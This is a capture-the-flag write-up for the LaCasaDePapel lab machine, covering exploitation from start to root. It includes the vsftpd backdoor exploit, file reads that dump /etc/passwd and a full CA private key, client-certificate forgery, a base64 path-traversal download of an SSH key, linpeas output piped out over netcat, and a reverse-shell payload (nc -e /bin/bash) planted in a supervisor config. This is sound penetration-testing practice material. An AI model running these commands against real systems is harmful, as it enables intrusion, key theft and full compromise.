Enumeration
export ip=10.10.10.131
ping $ip # TTL 63
nmap $ip -sC -sV
| Port | Service | Notes |
|---|---|---|
| 21 | ftp | vsftpd 2.3.4 |
| 22 | ssh | OpenSSH 7.9 (protocol 2.0) |
| 80 | http | Node.js (Express middleware) |
| Service Info: OS: Unix |
FTP
Trying anonymous login does not work.
vsftpd 2.3.4 is well known for having a malicious backdoor which opens port 6200 if a user tries to login with a smiley :). Metasploit has a module for this exploit which can test if this is indeed one of the malicious versions.
# get nfo on exploit
searchsploit vsftpd
searchsploit -x unix/remote/49757.py
# exploit
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set rhosts 10.10.10.131
run
# connect
telnet $ip 6200
This opens a Psy Shell.
Psy Shell from research is an itneractive debugger fr php. This means it can be used to execute php commands. Time for a well known php backdoor.
Testing the method to run systems commands e.g. with pwd returns a message that shell_exec() has been disabled for security reasons.
Writing php commands directly into the prmpt executes them. However trying common payloads shows that several aren’t loaded including exec() and proc_open().
Testing other useful php commands shows that scandir works, along with readfile.
scandir("/")
readfile("/etc/passwd")
/etc/passwd
readfile("/etc/passwd")
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
fwrite(fopen("/dev/shm/test", "w"), "Hello World");
readfile("/dev/shm/test")
# Write / Read success¬
scandir("/root")
# permission denied
scandir("/home/berlin/")
# .ssh, server.js, user.txt
scandir("/home/berlin/downloads")
scandir("/home/berlin/downloads/SEASON-1")
readfile("/home/berlin/user.txt")# permission denied
scandir("/home/berlin/.ssh") # authorized_keys
readfile("/home/berlin/.ssh/authorized_keys") # permission denied
scandir("/home/nairobi")
# ca.key
readfile("/home/nairobi/ca.key")
scandir("/home/oslo")
# Mailbox
scandir("/home/professor")
# .ssh, .ash_history
readfile("/home/professor/.ash_history")
# ... etc. but pretty much everything else of interest in the homedirs is locked
ca.key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
HTTP
Visiting the http service on port 80 in browser shows QR Code for a One-Time-Password. Scanning this QR code shows the secret is otpauth://hotp/Token?secret=INHUMUS3JE4XIIKMJ5YFG4TUKMZDSUDQ&algorithm=SHA1
For some reason possibly due to it not useing a valid hex or base32 code, this totp code doesn’t work for a lot of simple totp tools, like oathtool. To generate codes, I used a html project
git clone https://github.com/jaden/totp-generator
cd totp-generator/public
python -m http.server
This web service hosted on port 8123 can be used to generate OTPs for this code. I also noticed as I was testing the secret changed and seemed to rotate.
HTTPs
Trying the SSL version of the site presents a screen saying that a client certificate is necessary. The SSL certificate provides domain lacasadepapel.htb to use:
echo "address=/lacasadepapel.htb/$ip" | sudo tee /etc/NetworkManager/dnsmasq.d/domains.conf
sudo systemctl restart NetworkManager
A CA.crt has already been retrieved from the Psy shell, therefore it should be possible to generate client certificates, and if it is the correct CA certificate then ti can be used to authenticate with the web services.
openssl genrsa -out client.key 4096
openssl req -new -key client.key -out client.req
openssl x509 -req -in client.req -CA server.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer
openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Importing client.p12 into the browser as an authentication certificate, now grants access.
LFI
Trying an LFI payload shows this service is inside berlin home directory within the downlaods folder. Simply providing a payload of ?path=../ is enough to directory traverse upwards and escape.
The paths provided by browsing show a file list which can be downlaoded. An example downlaod link for 01.avi inside SEASON-1 is https://10.10.10.131/file/U0VBU09OLTEvMDEuYXZp Testing this for base64 reveals it’s the file path and is indeed 64 encoded
echo U0VBU09OLTEvMDEuYXZp | base64 --decode
# SEASON-1/01.avi
# leveradging this to extract the ssh private key
echo -n "../.ssh/id_rsa" | base64
# Li4vLnNzaC9pZF9yc2E=
curl https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E= -k > id_rsa
Trying different users on the system from the ftp enumeration, the ssh key can be found to belong to professor
chmod 400 id_rsa
ssh professor@$ip -i /tmp/ctf/id_rsa
Enumeration
Cracking out linpeas to automate enumeration:
scp -i /tmp/ctf/id_rsa linpeas.sh professor@$ip:/tmp
scp -i /tmp/ctf/id_rsa pspy64 professor@$ip:/tmp
# victim
cd /tmp
# host
nc -lvnp 9002 | tee linpeas.out
# victim
sh linpeas.sh | nc 10.10.14.8 9002
less -r linpeas.out
chmod +x pspy64
./pspy
Pspy shows a Memcached process which references the mamcached.js file in our user home. The configuration for this call seems to be in memcached.ini which we cna read
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
Since we have control of the directory, we can move this file and make another in its place `memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
move the file and edit
mv memcached.ini t
cat t > memcached.ini
add reverse shell payload
[program:memcached]
command = nc 10.10.14.8 1234 -e /bin/bash
setup up listener and wait
nc -lvnp 1234
And the root shell comes in.